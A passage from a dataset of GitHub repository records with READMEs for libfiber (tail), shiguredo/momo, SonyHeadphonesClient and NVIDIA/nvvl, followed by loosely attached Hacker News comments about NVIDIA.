acl_fiber_rwlock_runlock \n- acl_fiber_rwlock_wunlock \n\nACL_FIBER_EVENT \n- acl_fiber_event_create \n- acl_fiber_event_free \n- acl_fiber_event_wait \n- acl_fiber_event_trywait \n- acl_fiber_event_notify \n\nACL_FIBER_SEM \n- acl_fiber_sem_create \n- acl_fiber_sem_free \n- acl_fiber_sem_wait \n- acl_fiber_sem_post \n- acl_fiber_sem_num\n\n## \u5173\u4e8e API Hook\n\u5728 Linux/MacOS/FreeBSD \u5e73\u53f0\u4e0a\uff0c\u5f88\u591a\u4e0e IO \u548c\u7f51\u7edc\u76f8\u5173\u7684\u7684\u7cfb\u7edf API \u88ab hook \u4e86\uff0c\u56e0\u6b64\uff0c\u5728\u7f16\u8bd1\u8fde\u63a5\u65f6\u5c06 libfiber \u52a0\u4e0a\uff0c\u8fd9\u6837\u4f60\u7684\u5e94\u7528\u7a0b\u5e8f\u4e2d\u4ec5\u9700\u4f7f\u7528\u7cfb\u7edf\u6807\u51c6 IO API\uff0c\u4fbf\u53ef\u4ee5\u4f7f\u4f60\u7684\u7f51\u7edc\u7a0b\u5e8f\u81ea\u52a8\u534f\u7a0b\u5316\u3002\u4e0b\u9762\u662f\u4e00\u4e9b\u88ab hook \u7684\u7cfb\u7edf API \u5217\u8868\uff1a \n- close\n- sleep\n- read\n- readv\n- recv\n- recvfrom\n- recvmsg\n- write\n- writev\n- send\n- sendto\n- sendmsg\n- sendfile64\n- socket\n- listen\n- accept\n- connect\n- select\n- poll\n- epoll: epoll_create, epoll_ctl, epoll_wait\n- gethostbyname(_r)\n- getaddrinfo/freeaddrinfo\n\n## FAQ\n\uff08\u5f85\u7eed\uff0c\u8bf7\u5148\u53c2\u8003\u82f1\u6587\u7248 FAQ \u8bf4\u660e\uff09\u3002\u3002\u3002\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "shiguredo/momo", "link": "https://github.com/shiguredo/momo", "tags": ["webrtc", "libwebrtc", "raspberry-pi", "macos", "ubuntu", "4k-video", "jetson", "windows"], "stars": 661, "description": "WebRTC Native Client Momo", "lang": "C++", "repo_lang": "", "readme": "# WebRTC Native Client Momo\n\n[![libwebrtc](https://img.shields.io/badge/libwebrtc-m107.5304-blue.svg)](https://chromium.googlesource.com/external/webrtc/+/branch-heads/ 5304)\n[![GitHub tag (latest SemVer)](https://img.shields.io/github/tag/shiguredo/momo.svg)](https://github.com/shiguredo/momo)\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n[![Actions Status](https://github.com/shiguredo/momo/workflows/daily-build-workflow/badge.svg)](https://github.com/shiguredo/momo/actions)\n\n## About Shiguredo's open source software\n\nWe will not respond to PRs or issues that have not been discussed on Discord.\n\nPlease read https://github.com/shiguredo/oss/blob/master/README.en.md before use.\n\n## About Shiguredo's open source software\n\nPlease read https://github.com/shiguredo/oss before using.\n\n## About WebRTC Native Client Momo\n\nWebRTC Native Client Momo is a WebRTC native client that uses libwebrtc and works in various environments without a browser.\n\nhttps://momo.shiguredo.jp/\n\n### Support for hardware encoders\n\n- [NVIDIA Jetson](https://www.nvidia.com/ja-jp/autonomous-machines/embedded-systems/) by using VP8, VP9 and H.264 hardware encoder functions 4K@30 delivery is possible\n- It is possible to use the H.264 hardware encoder function built into the GPU of [Raspberry Pi](https://www.raspberrypi.org/)\n- You can use the H.264 hardware accelerator function installed in Apple macOS via [VideoToolbox](https://developer.apple.com/documentation/videotoolbox)\n- It is possible to use the hardware accelerator function installed in NVIDIA graphics cards via [NVIDIA VIDEO CODEC SDK](https://developer.nvidia.com/nvidia-video-codec-sdk)\n- [Intel Quick Sync Video](https://www.intel.co.jp/content/www/jp/ja/architecture-and-technology/quick-sync-video/quick-sync-video-general.html) VP9 / H. 264 hardware acceleration function is available.\n\n### Broadcast at 4K 30fps\n\nMomo can deliver 4K 60fps with WebRTC by using a hardware encoder\n\n### Support for simulcast\n\nMomo supports simulcast (simultaneous distribution of multiple image quality) when using Sora mode.\n\n### serial number via data channelAl reading and writing\n\nMomo can read and write directly to serial using the data channel. It is assumed to be used when you want to prioritize low latency over reliability.\n\n### Receiving audio and video using SDL\n\nWhen using Momo in a GUI environment, you can receive audio and video using [Simple DirectMedia Layer](https://www.libsdl.org/).\n\n### Support for AV1\n\nAV1 transmission/reception is already supported.\n\n### Support for client certificates\n\nMomo supports client certificates when using Sora mode.\n## movie\n\n[4K@30 delivery with WebRTC Native Client Momo and Jetson Nano](https://www.youtube.com/watch?v=z05bWtsgDPY)\n\n## About the OpenMomo project\n\nOpenMomo is a project that publishes WebRTC Native Client Momo as open source and continuously develops it.\nWe hope that WebRTC can be used for various purposes other than browsers and smartphones.\n\nPlease see below for details.\n\n[OpenMomo Project](https://gist.github.com/voluntas/51c67d0d8ce7af9f24655cee4d7dd253)\n\nMomo's tweets are summarized below.\n\nhttps://gist.github.com/voluntas/51c67d0d8ce7af9f24655cee4d7dd253#twitter\n\n## Known Issues\n\n[Resolution policy for known issues](https://github.com/shiguredo/momo/issues/89)\n\n## About binary offer\n\nYou can download it from below.\n\nhttps://github.com/shiguredo/momo/releases\n\n## Operating environment\n\n- Raspberry Pi OS (64bit) ARMv8\n - Raspberry Pi 4\n - Raspberry Pi 3\n - Raspberry Pi 2\n- Raspberry Pi OS (32bit) ARMv7\n - Raspberry Pi 4\n - Raspberry Pi 3\n - Raspberry Pi 2\n - Raspberry Pi Zero 2\n- Raspberry Pi OS (32bit) ARMv6\n - Raspberry Pi Zero\n - Raspberry Pi 1\n- Ubuntu 20.04 x86_64\n- Ubuntu 18.04 ARMv8 Jetson\n - Ends at the end of April 2023\n - [NVIDIA Jetson Nano](https://www.nvidia.com/en-us/autonomous-machines/embedded-systems/jetson-nano/)\n - [NVIDIA Jetson Xavier NX](https://www.nvidia.com/en-us/autonomous-machines/embedded-systems/jetson-xavier-nx/)\n - [NVIDIA Jetson AGX Xavier](https://www.nvidia.com/en-us/autonomous-machines/embedded-systems/jetson-agx-xavier/)\n- macOS 12 arm64 or later\n- Windows 10.1809 x86_64 or newer\n\n### incompatible\n\n- macOS x86_64\n- Ubuntu 20.04 ARMv8 Jetson\n - [NVIDIA Jetson AGX Orin](https://www.nvidia.com/en-us/autonomous-machines/embedded-systems/jetson-orin/)\n - [NVIDIA Jetson Orin NX](https://www.nvidia.com/en-us/autonomous-machines/embedded-systems/jetson-orin/)\n - [NVIDIA Jetson Xavier NX](https://www.nvidia.com/en-us/autonomous-machines/embedded-systems/jetson-xavier-nx/)\n - [NVIDIA Jetson AGX Xavier](https://www.nvidia.com/en-us/autonomous-machines/embedded-systems/jetson-agx-xavier/)\n - [NVIDIA Jetson Orin Nano](https://www.nvidia.com/ja-jp/autonomous-machines/embedded-systems/jetson-orin/)\n\n## try it\n\nIf you want to try Momo, read [USE.md](doc/USE.md).\n\n## Build\n\n- If you want to build Momo for Linux, read [BUILD_LINUX.md](doc/BUILD_LINUX.md)\n- If you want to build Momo for macOS, read [BUILD_MACOS.md](doc/BUILD_MACOS.md)\n- If you want to build Momo for Windows, read [BUILD_WINDOWS.md](doc/BUILD_WINDOWS.md)\n\n## create a package\n\nIf you want to create a package, please read [PACKAGE.md](doc/PACKAGE.md).\n\n##FAQs\n\nPlease read [FAQ.md](doc/FAQ.md).\n\n## License\n\nApache License 2.0\n\n```\nCopyright 2015-2022, tnoho (Original Author)\nCopyright 2018-2022, Shiguredo Inc.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n```\n\n## Preferred implementation\n\nPriority implementation is to implement Momo's scheduled implementation functions ahead of schedule for a fee only for customers who have a Sora license contract.\n\n- OSS version for Windows\n - [Sloth Networks Co., Ltd.] (http://www.sloth-networks.co.jp)\n- Supports WebRTC's Statistics\n - Company name not disclosed at this time\n- Supports Momo NVIDIA VIDEO CODEC SDK for Windows\n - [Sloth Networks Co., Ltd.] (http://www.sloth-networks.co.jp)\n- Supports Momo NVIDIA VIDEO CODEC SDK for Linux\n - [Optim Co., Ltd.](https://www.optim.co.jp/)\n- Windows / Linux version screen capture supported\n - [Sloth Networks Co., Ltd.] (http://www.sloth-networks.co.jp)\n\n### Feature list for priority implementation\n\n**Feel free to contact us via Discord or email for more information**\n\n- AV1 compatible\n - Windows\n- Statistics function\n - output via Ayame's signaling\n- oneVPL compatible\n- Recording support\n - Output in MP4 format\n - Output in WebM format\n- Recording composition support\n- E2EE function when using Sora mode\n- Windows / macOS signature support\n\n## E-book about Momo\n\nA book full of Momo know-how written by Momo's original author @tnohoIt is sold.\n\n[Why don't you use WebRTC outside the browser to increase what you can do with the browser?\n\n## Support\n\n### Discord\n\n- **NOT SUPPORTED**\n- advise\n- Feedback welcome\n\nWe share the latest situation on Discord. Questions and consultations are also accepted only on Discord.\n\nhttps://discord.gg/shiguredo\n\n### Bug report\n\nPlease join us on Discord.\n\n### About Paid Technical Support\n\nA paid technical support contract for WebRTC Native Client is based on the assumption that customers have a WebRTC SFU Sora license contract.\n\n- Momo technical support\n- Add functions to Momo on the premise of OSS release\n\n## H.264 license fee\n\nNo license fee is required for a single Momo distribution that uses the H.264 hardware encoder **only**.\nWhen distributing with hardware, it is necessary to pay a license fee.\n\nHowever, since the H.264 license is included in the hardware cost of the Raspberry Pi,\nYou don't have to pay any license fees at the time of distribution.\n\nWe recommend contacting [MPEG LA](https://www.mpegla.com/) for more information.\n\n- Raspberry Pi's hardware encoder license cost is included in the Raspberry Pi price\n - https://www.raspberrypi.org/forums/viewtopic.php?t=200855\n- Apple's license fee is limited to personal and non-commercial use, so a separate contract with an organization is required for distribution\n - https://store.apple.com/Catalog/Japan/Images/EA0270_QTMPEG2.html\n- License fee for hardware encoder for AMD video card is separate and requires a contract with an organization\n - https://github.com/GPUOpen-LibrariesAndSDKs/AMF/blob/master/amf/doc/AMF_API_Reference.pdf\n- License fee for hardware encoder of NVIDIA video card is separate and contract with organization is required.\n - https://developer.download.nvidia.com/designworks/DesignWorks_SDKs_Samples_Tools_License_distrib_use_rights_2017_06_13.pdf\n- NVIDIA Jetson Nano's hardware encoder license fee is separate and requires a contract with an organization\n - [License for H\\.264/H\\.265 Hardware Encoder with NVIDIA Jetson Nano](https://medium.com/@voluntas/nvidia-jetson-nano-%E6%90%AD%E8% BC%89%E3%81%AE-h-264-h-265-%E3%83%8F%E3%83%BC%E3%83%89%E3%82%A6%E3%82%A7%E3 %82%A2%E3%82%A8%E3%83%B3%E3%82%B3%E3%83%BC%E3%83%80%E3%81%AE%E3%83%A9%E3%82 %A4%E3%82%BB%E3%83%B3%E3%82%B9%E3%81%AB%E3%81%A4%E3%81%84%E3%81%A6-ca207af302ee)\n- Intel Quick Sync Video hardware encoder license fee is separate and requires a contract with an organization\n - [QuickSync \\- H\\.264 patent licensing fees \\- Intel Community](https://community.intel.com/t5/Media-Intel-oneAPI-Video/QuickSync-H-264-patent-licensing-fees/ td-p/921396)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Plutoberth/SonyHeadphonesClient", "link": "https://github.com/Plutoberth/SonyHeadphonesClient", "tags": ["reverse-engineering", "cpp", "dear-imgui", "imgui", "bluetooth", "macos", "linux", "windows", "gui"], "stars": 660, "description": "A {Windows, macOS, Linux} client recreating the functionality of the Sony Headphones app", "lang": "C++", "repo_lang": "", "readme": "

\n \n \n \n\n

Sony Headphones Client

\n\n This project features a PC alternative for the mobile-only Sony Headphones app.\n

\n \"Program


\n\n [![macOS](https://github.com/plutoberth/sonyheadphonesclient/actions/workflows/xcodebuild.yml/badge.svg)](https://github.com/Plutoberth/SonyHeadphonesClient/actions/workflows/xcodebuild.yml)\n [![Linux & Windows](https://github.com/plutoberth/sonyheadphonesclient/actions/workflows/cmake.yml/badge.svg)](https://github.com/Plutoberth/SonyHeadphonesClient/actions/workflows/cmake.yml)\n [![Github all releases](https://img.shields.io/github/downloads/Plutoberth/SonyHeadphonesClient/total.svg)](https://GitHub.com/Plutoberth/SonyHeadphonesClient/releases/)\n [![Donate](static/badge.svg)](https://paypal.me/plutoberth)\n
\n

\n\n\n## Table of Contents\n\n* [Disclaimer](#disclaimer)\n* [Download](#download)\n* [Motivation](#motivation)\n* [Features](#features)\n* [Supported Platforms](#supported-platforms-and-headsets)\n* [For Developers](#for-developers)\n* [Contributors](#contributors)\n* [License](#license)\n\n\n## Disclaimer\n\n### THIS PROGRAM IS NOT AFFILIATED WITH SONY. YOU ARE RESPONSIBLE FOR ANY DAMAGE THAT MAY OCCUR WHILE USING THIS PROGRAM.\n\n## Download\n\nYou can download compiled versions of the client from the [releases page](https://github.com/Plutoberth/SonyHeadphonesClient/releases).\n\n**Note:** If you're getting an error like `VCRUNTIME140_1.dll was not found`, you need to install the `Microsoft VC++ Redistributable`.\n\n## Motivation\n\nI recently bought the WH-1000-XM3s, and I was annoyed by the fact that I couldn't change their settings while using my PC.\nSo I reverse-engineered the application (for intercompatibility purposes, of course), defined the protocol, and created with an alternative application with [Mr-M33533K5](https://github.com/Mr-M33533K5).\n\n## Features\n\n- [x] Ambient Sound Control\n- [x] Disabling noise cancelling\n- [x] Virtual Sound - VPT and Sound Position\n- [ ] Display battery life and fetch existing settings from device\n- [ ] Equalizer\n\n## Supported Platforms And Headsets\n\n* WH-1000-XM3: Fully works and supported\n* [WH-1000-XM4](https://github.com/Plutoberth/SonyHeadphonesClient/issues/29#issuecomment-792459162): Partially works, more work is needed\n* [MDR-XB950BT](https://github.com/Plutoberth/SonyHeadphonesClient/issues/29#issuecomment-804292227): Fully works\n* And more! Check out [Headset Reports](https://github.com/Plutoberth/SonyHeadphonesClient/issues/29)\n\n#### **Please report about your experiences using other Sony headsets in the [Headset Reports](https://github.com/Plutoberth/SonyHeadphonesClient/issues/29) issue.**\n\n- [x] Windows\n- [x] Linux\n- [x] macOS\n- [ ] ~~TempleOS~~\n\n## For Developers\n\n```git clone --recurse-submodules https://github.com/Plutoberth/SonyHeadphonesClient.git```\n\nIssue this incantation to fix submodule issues:\n```sh\ngit submodule sync\ngit submodule update\n```\n\n### Protocol Information\n\nSome enums and data are present in the code. The rest has to be obtained either statically or dynamically.\n\nSniffing messages - See [this helpful comment](https://github.com/Plutoberth/SonyHeadphonesClient/pull/36#issuecomment-795633877) by @guilhermealbm.\n\n### Compiling\n\n#### Windows & Linux\n\n```\ncd Client\nmkdir build\ncd build\ncmake ..\ncmake --build .\n```\n\nLinux Dependencies (Debian/Ubuntu):\n\n```bash\nsudo apt install libbluetooth-dev libglew-dev libglfw3-dev libdbus-1-dev\n```\n\n#### macOS\n\nUse the provided xcodeproj file.\n\n## Contributors\n\n* [Plutoberth](https://github.com/Plutoberth) - Initial Work and Windows Version\n* [Mr-M33533K5](https://github.com/Mr-M33533K5) - BT Interface and Other Help\n* [semvis123](https://github.com/semvis123) - macOS Version\n* [jimzrt](https://github.com/jimzrt) - Linux Version\n* [guilhermealbm](https://github.com/guilhermealbm) - Noise Cancelling Switch\n\n\n## License\n\nDistributed under the [MIT License](https://github.com/Plutoberth/SonyHeadphonesClient/blob/master/LICENSE). See LICENSE for more information.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "NVIDIA/nvvl", "link": "https://github.com/NVIDIA/nvvl", "tags": [], "stars": 659, "description": "A library that uses hardware acceleration to load sequences of video frames to facilitate machine learning training", "lang": "C++", "repo_lang": "", "readme": "# NVVL is part of DALI!\n[DALI (Nvidia Data Loading Library)](https://developer.nvidia.com/dali) incorporates NVVL functionality and offers much more than that, so it is recommended to switch to it.\nDALI source code is also open source and available on the [GitHub](https://github.com/NVIDIA/DALI).\nUp to date documentation can be found [here](https://docs.nvidia.com/deeplearning/sdk/dali-developer-guide/docs/index.html).\nNVVL project will still be available on the GitHub but it won't be maintained. All issues and request for the future please [submit in the DALI repository](https://github.com/NVIDIA/DALI/issues).\n\n# NVVL\nNVVL (**NV**IDIA **V**ideo **L**oader) is a library to load random\nsequences of video frames from compressed video files to facilitate\nmachine learning training. It uses FFmpeg's libraries to parse and\nread the compressed packets from video files and the video decoding\nhardware available on NVIDIA GPUs to off-load and accelerate the\ndecoding of those packets, providing a ready-for-training tensor in\nGPU device memory. NVVL can additionally perform data augmentation\nwhile loading the frames. Frames can be scaled, cropped, and flipped\nhorizontally using the GPUs dedicated texture mapping units. Output\ncan be in RGB or YCbCr color space, normalized to [0, 1] or [0, 255],\nand in `float`, `half`, or `uint8` tensors.\n\n**Note that, while we hope you find NVVL useful, it is example code\nfrom a research project performed by a small group of NVIDIA researchers.\nWe will do our best to answer questions and fix small bugs as they come\nup, but it is not a supported NVIDIA product and is for the most part\nprovided as-is.**\n\nUsing compressed video files instead of individual frame image files\nsignificantly reduces the demands on the storage and I/O systems\nduring training. Storing video datasets as video files consumes an\norder of magnitude less disk space, allowing for larger datasets to\nboth fit in system RAM as well as local SSDs for fast access. During\nloading fewer bytes must be read from disk. Fitting on smaller, faster\nstorage and reading fewer bytes at load time allievates the bottleneck\nof retrieving data from disks, which will only get worse as GPUs get\nfaster. For the dataset used in our example project, H.264 compressed\n`.mp4` files were nearly 40x smaller than storing frames as `.png`\nfiles.\n\nUsing the hardware decoder on NVIDIA GPUs to decode images\nsignificantly reduces the demands on the host CPU. This means fewer\nCPU cores need to be dedicated to data loading during training. This\nis especially important in servers with a large number of GPUs per\nCPU, such as the in the NVIDIA DGX-2 server, but also provides\nbenefits for other platforms. When training our example project on a\nNVIDIA DGX-1, the CPU load when using NVVL was 50-60% of the load seen\nwhen using a normal dataloader for `.png` files.\n\nMeasurements that quantify the performance advantages of using NVVL\nare detailed in our [super resolution example\nproject](/examples/pytorch_superres).\n\nMost users will want to use the deep learning framework wrappers\nprovided rather than using the library directly. Currently a wrapper\nfor PyTorch is provided (PR's for other frameworks are welcome). See\nthe [PyTorch wrapper README](/pytorch/README.md) for documentation on\nusing the PyTorch wrapper. Note that it is not required to build or\ninstall the C++ library before building the PyTorch wrapper (its\nsetup scripts will do so for you).\n\n# Building and Installing\n\nNVVL depends on the following:\n- CUDA Toolkit. We have tested versions 8.0 and later but earlier\n versions may work. NVVL will perform better with CUDA 9.0 or\n later[1](#f1).\n- FFmpeg's libavformat, libavcodec, libavfilter, and libavutil. These\n can be installed from source as in the [example\n Dockerfiles](/docker) or from the Ubuntu 16.04 packages\n `libavcodec-dev libavfilter-dev libavformat-dev\n libavutil-dev`. Other distributions should have similar packages.\n\nAdditionally, building from source requires CMake version 3.8 or above\nand some examples optionally make use of some libraries from OpenCV if\nthey are installed.\n\nThe [docker](docker) directory contains Dockerfiles that can be used\nas a starting point for creating an image to build or use the NVVL\nlibrary. The [example's docker directory](examples/pytorch/docker) has\nan example Dockerfile that actually builds and installs the NVVL\nlibrary.\n\nCMake 3.8 and above provides builtin CUDA language support that NVVL's\nbuild system uses. Since CMake 3.8 is relatively new and not yet in\nwidely used Linux distribution, it may be required to install a new\nversion of CMake. The easiest way to do so is to make use of their\npackage on PyPI:\n\n```\npip install cmake\n```\n\nAlternatively, or if `pip` isn't available, you can install to\n`/usr/local` from a binary distribution:\n\n```sh\nwget https://cmake.org/files/v3.10/cmake-3.10.2-Linux-x86_64.sh\n/bin/sh cmake-3.10.2-Linux-x86_64.sh --prefix=/usr/local\n```\n\nSee https://cmake.org/download/ for more options.\n\nBuilding and installing NVVL follows the typical CMake pattern:\n\n```sh\nmkdir build && cd build\ncmake ..\nmake -j\nsudo make install\n```\n\nThis will install `libnvvl.so` and development headers into\nappropriate subdirectores under `/usr/local`. CMake can be passed the\nfollowing options using `cmake .. -DOPTION=Value`:\n\n- `CUDA_ARCH` - Name of a CUDA architecture to generate device code\n for, seperated via a semicolon. Valid options are `Kepler`,\n `Maxwell`, `Pascal`, and `Volta`. You can also use specific\n architecture names such as `sm_61`. Default is\n `Maxwell;Pascal;Volta`.\n\n- `CMAKE_CUDA_FLAGS` - A string of arguments to pass to `nvcc`. In\n particular, you can decide to link against the static or shared\n runtime library using `-cudart shared` or `-cudart static`. You can\n also use this for finer control of code generation than `CUDA_ARCH`,\n see the `nvcc` documentation. Default is `-cudart shared`.\n\n- `WITH_OPENCV` - Set this to 1 to build the examples with the\n optional OpenCV functionality.\n\n- `CMAKE_INSTALL_PREFIX` - Install directory. Default is\n `/usr/local`.\n\n- `CMAKE_BUILD_TYPE` - `Debug` or `Release` build.\n\nSee the [CMake documentation](https://cmake.org/cmake/help/v3.8/) for\nmore options.\n\nThe examples in `doc/examples` can be built using the `examples` target:\n```\nmake examples\n```\n\nFinally, if Doxygen is installed, API documentation can be built using\nthe `doc` target:\n```\nmake doc\n```\nThis will build html files in `doc/html`.\n\n# Preparing Data\n\nNVVL supports the H.264 and HEVC (H.265) video codecs in any container\nformat that FFmpeg is able to parse. Video codecs only store certain\nframes, called keyframes or intra-frames, as a complete image in the\ndata stream. All other frames require data from other frames, either\nbefore or after it in time, to be decoded. In order to decode a\nsequence of frames, it is necessary to start decoding at the keyframe\nbefore the sequence, and continue past the sequence to the next\nkeyframe after it. This isn't a problem when streaming sequentially\nthrough a video; however, when decoding small sequences of frames\nrandomly throughout the video, a large gap between keyframes results in\nreading and decoding a large amount of frames that are never used.\n\nThus, to get good performance when randomly reading short sequences\nfrom a video file, it is necessary to encode the file with frequent\nkey frames. We've found setting the keyframe interval to the length of\nthe sequences you will be reading provides a good compromise between\nfilesize and loading performance. Also, NVVL's seeking logic doesn't\nsupport open GOPs in HEVC streams. To set the keyframe interval to `X`\nwhen using `ffmpeg`:\n\n- For `libx264` use `-g X`\n- For `libx265` use `-x265-params \"keyint=X:no-open-gop=1\"`\n\nThe pixel format of the video must also be yuv420p to be supported by\nthe hardware decoder. This is done by passing `-pix_fmt yuv420p` to\n`ffmpeg`. You should also remove any extra audio or video streams from\nthe video file by passing `-map v:0` to ffmpeg after the input but\nbefore the output.\n\nFor example to transcode to H.264:\n```\nffmpeg -i original.mp4 -map v:0 -c:v libx264 -crf 18 -pix_fmt yuv420p -g 5 -profile:v high prepared.mp4\n```\n\n# Basic Usage\nThis section describes the usage of the base C/C++ library, for usage\nof the PyTorch wrapper, see the [README](/pytorch/README.md) in the\npytorch directory.\n\nThe library provides both a C++ and C interface. See the examples in\n[doc/examples](doc/examples) for brief example code on how to use the\nlibrary. [extract_frames.cpp](doc/examples/extract_frames.cpp)\ndemonstrates the C++ interface and\n[extract_frames_c.c](doc/examples/extract_frames_c.c) the C\ninterface. The API documentation built with `make doc` is the\ncanonical reference for the API.\n\nThe basic flow is to create a `VideoLoader` object, tell it which\nframe sequences to read, and then give it buffers in device memory to\nput the decoded sequences into. In C++, creating a video loader is\nstraight forward:\n\n```C++\nauto loader = NVVL::VideoLoader{device_id};\n```\n\nYou can then tell it which sequences to read via `read_sequence`:\n\n```C++\nloader.read_sequence(filename, frame_num, sequence_length);\n\n```\n\nTo receive the frames from the decoder, it is necessary to create a\n`PictureSequence` to tell it how and where you want the decoded frames\nprovided. First, create a `PictureSequence`, providing a count of the\nnumber of frames to receive from the decoder. Note that the count here\ndoes not need to be the same as the sequence_length provided to\n`read_sequence`; you can read a large sequence of frames and receive\nthem as multiple tensors, or read multiple smaller sequences and\nreceive them concatenated as a single tensor.\n\n```C++\nauto seq = PictureSequence{sequence_count};\n```\n\nYou now create \"Layers\" in the sequence to provide the destination for\nthe frames. Each layer can be a different type, have different\nprocessing, and contain different frames from the received\nsequence. First, create a `PictureSequence::Layer` of the desired\ntype:\n\n```C++\nauto pixels = PictureSequence::Layer{};\n```\n\nNext, fill in the pointer to the data and other details. See the\ndocumentation in [PictureSequence.h](include/PictureSequence.h) for a\ndescription of all the available options.\n\n```C++\nfloat* data = nullptr;\nsize_t pitch = 0;\ncudaMallocPitch(&data, &pitch,\n crop_width * sizeof(float),\n crop_height * sequence_count * 3);\npixels.data = data;\npixels.desc.count = sequence_count;\npixels.desc.channels = 3;\npixels.desc.width = crop_width;\npixels.desc.height = crop_height;\npixels.desc.scale_width = scale_width;\npixels.desc.scale_height = scale_height;\npixels.desc.horiz_flip = false;\npixels.desc.normalized = true;\npixels.desc.color_space = ColorSpace_RGB;\npixels.desc.stride.x = 1;\npixels.desc.stride.y = pitch / sizeof(float);\npixels.desc.stride.c = pixels.desc.stride.y * crop_height;\npixels.desc.stride.n = pixels.desc.stride.c * 3;\n```\n\nNote that here we have set the strides such that the dimensions are\n\"nchw\", we could have done \"nhwc\" or any other dimension order by\nsetting the strides appropriately. Also note that the strides in the\nlayer description are number of elements, not number of bytes.\n\nWe now add this layer to our `PictureSequence`, and send it to the loader:\n\n```C++\nseq.set_layer(\"pixels\", pixels);\nloader.receive_frames(seq);\n```\n\nThis call to `receive_frames` will be\nasynchronous. `receive_frames_sync` can be used if synchronous reading\nis desired. When we are ready to use the frames we can insert a wait\nevent into the CUDA stream we are using for our computation:\n\n```C++\nseq.wait(stream);\n```\n\nThis will insert a wait event into the stream `stream`, causing any\nfurther kernels launched on `stream` to wait until the data is\nready.\n\nThe C interface follows a very similar pattern, see\n[doc/examples/extract_frames_c.c](doc/examples/extract_frames_c.c)\nfor an example.\n\n# Reference\nIf you find this library useful in your work, please cite it in your\npublications using the following BibTeX entry:\n\n```\n@misc{nvvl,\n author = {Jared Casper and Jon Barker and Bryan Catanzaro},\n title = {NVVL: NVIDIA Video Loader},\n year = {2018},\n publisher = {GitHub},\n journal = {GitHub repository},\n howpublished = {\\url{https://github.com/NVIDIA/nvvl}}\n}\n```\n\n# Footnotes\n\n[1] Specifically, with nvidia kernel modules version\n384 and later, which come with CUDA 9.0+, CUDA kernels launched by\nNVVL will run asynchronously on a separate stream. With earlier kernel\nmodules, all CUDA kernels are launched on the default stream. [\u21a9](#a1)\n", "readme_type": "markdown", "hn_comments": "It seems there's some servere issues with NVIDIA Drivers on Windows which is causing high latency for many users. The issue seems to be that there's a high DPC routine execution time in the module nvlddmkm.sys which causes the aforementioned latency spikes. The problem is reported by lots of users with different hardware specs. It doesn't seem to be either Intel or AMD specific. The only thing all users seem to have in common is using Windows with a NVIDIA GPU. Until today neither Microsoft nor NVIDIA seem to be aware about this issue. I wish someone could raise some awareness about this issue with either of the companies, as this is an issue which is making Music Production on modern Windows almost impossible due to crackles, dropouts and other annoying issues. If you know anyone working at Microsoft or NVIDIA, I'd be super happy if you could point them towards the thread I've linked. Thanks!> Grace CPU uses LPDDR5XLooks like we\u2019re finally going with soldered RAM in the data center?Seems like this will end up driving more research into very large ML models. Some of the performance benchmarks here are for trillion parameter models. I\u2019ve observed that often Innovation directly follows silicon improvements.Are the vertical-specific Nvidia SDKs like DRIVE and Clara widely used?grace and hopper? from stranger things?I want one. Damn hotchips always has stuff I want and then can never afford even when it gets to marketNvidia opened new huge building with huge open spaces in their campus.Direct link to review article from CNET: \nNvidia has opened up a new building at its Santa Clara, California, headquarters. Voyager's unusual architecture is designed to keep company workers happy and productive.\nhttps://www.cnet.com/tech/computing/nvidias-massive-techno-p...Engineers working on hard problems in a big, distraction-filled open area. Who wouldn't want to work there?What did happen with the lapsus stuff?Will nvidia switch to open source or their hardware verilog/vhdl and driver code were leaked?From the license file:> 3.4 Patent Claims. If you bring or threaten to bring a patent claim against any Licensor (including any claim, cross-claim or counterclaim in a lawsuit) to enforce any patents that you allege are infringed by any Work, then your rights under this License from such Licensor (including the grant in Section 2.1) will terminate immediately.Is such a clause legal? I have basically zero knowledge of such things, but it seems like it should be illegal to punish someone for a good faith patent claim.This produces a kind of artefact I haven't seen before, involving little chains of circles and diamonds, e.g. https://nvlabs-fi-cdn.nvidia.com/stylegan3/images/stylegan3-..., https://nvlabs-fi-cdn.nvidia.com/stylegan3/images/stylegan3-... (hair). I think they follow those glowing coordinate-ish lines from the internal representation.It also seems to have given some faces contact lenses! https://nvlabs-fi-cdn.nvidia.com/stylegan3/images/stylegan3-..., https://nvlabs-fi-cdn.nvidia.com/stylegan3/images/stylegan3-...> This material is based upon work supported by the US Defense Advanced Research Projects Agency (DARPA) under Contracts No.R00112030005, HR001120C0123, HR001120C0124 and FA8750-20-2-1004 and the Air Force Research Laboratory (AFRL) under Contract No. FA8750-20-2-1004.This is why AI is just a marketing term with no real future.There isn't room for corporations to profit from it out of the gate + into the future indefinitely. No one is going to pay an AWS tax to use their models on every single API hit forever. No one is going to pay nVidia a license fee to use their image recognition tools forever. If the creators of HTML, CSS, and Javascript wanted license fees we wouldn't be using them right now either.There are two groups of people, off the top of my head, who care about all of this:1) The US Military, because the budget for their murder robots is theoretically infinite.2) Google and Facebook because the budget for their spyware is theoretically infinite.To everyone else, it's much ado about nothing.I appreciate the section on \"Synthetic image detection\":\"While new generator approaches enable new media synthesis capabilities, they may also present a new challenge for AI forensics algorithms for detection and attribution of synthetic media. In collaboration with digital forensic researchers participating in DARPA's SemaFor program, we curated a synthetic image dataset that allowed the researchers to test and validate the performance of their image detectors in advance of the public release. Please see here for more details on detection\" https://github.com/NVlabs/stylegan3-detectorIt's important to see this sort of thing happening more and more.Is minimum 12GB limit on purpose to make people buy new GPUs? It's sad that this growing area is becoming for privileged people only.There are videos that show what they mean by \"details glued to image coordinates\" in StyleGAN2: https://nvlabs-fi-cdn.nvidia.com/stylegan3/videos/The visualizer looks fun: https://twitter.com/minimaxir/status/1447679798822649856You can't use any of it commercially. Nothing within is under an acceptable software license (nor an open source 